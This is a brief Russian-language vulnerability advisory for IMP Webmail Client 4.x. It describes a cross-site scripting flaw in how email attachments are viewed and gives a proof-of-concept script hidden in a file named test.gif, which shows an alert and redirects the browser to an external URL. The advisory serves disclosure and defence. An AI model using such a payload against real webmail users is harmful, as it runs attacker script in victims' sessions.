Программа: IMP Webmail Client 4.x
Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует при просмотре вложений письма. Удаленный пользователь
может с помощью специально сформированного письма выполнить произвольный HTML
код в браузере жертвы в контексте безопасности уязвимого сайта.
test.gif
<script language=javascript>
alert('GIF');
document.location.href ='http://i3.microsoft.com/h/en-us/i/one_care_2_10.jpg';
</script>
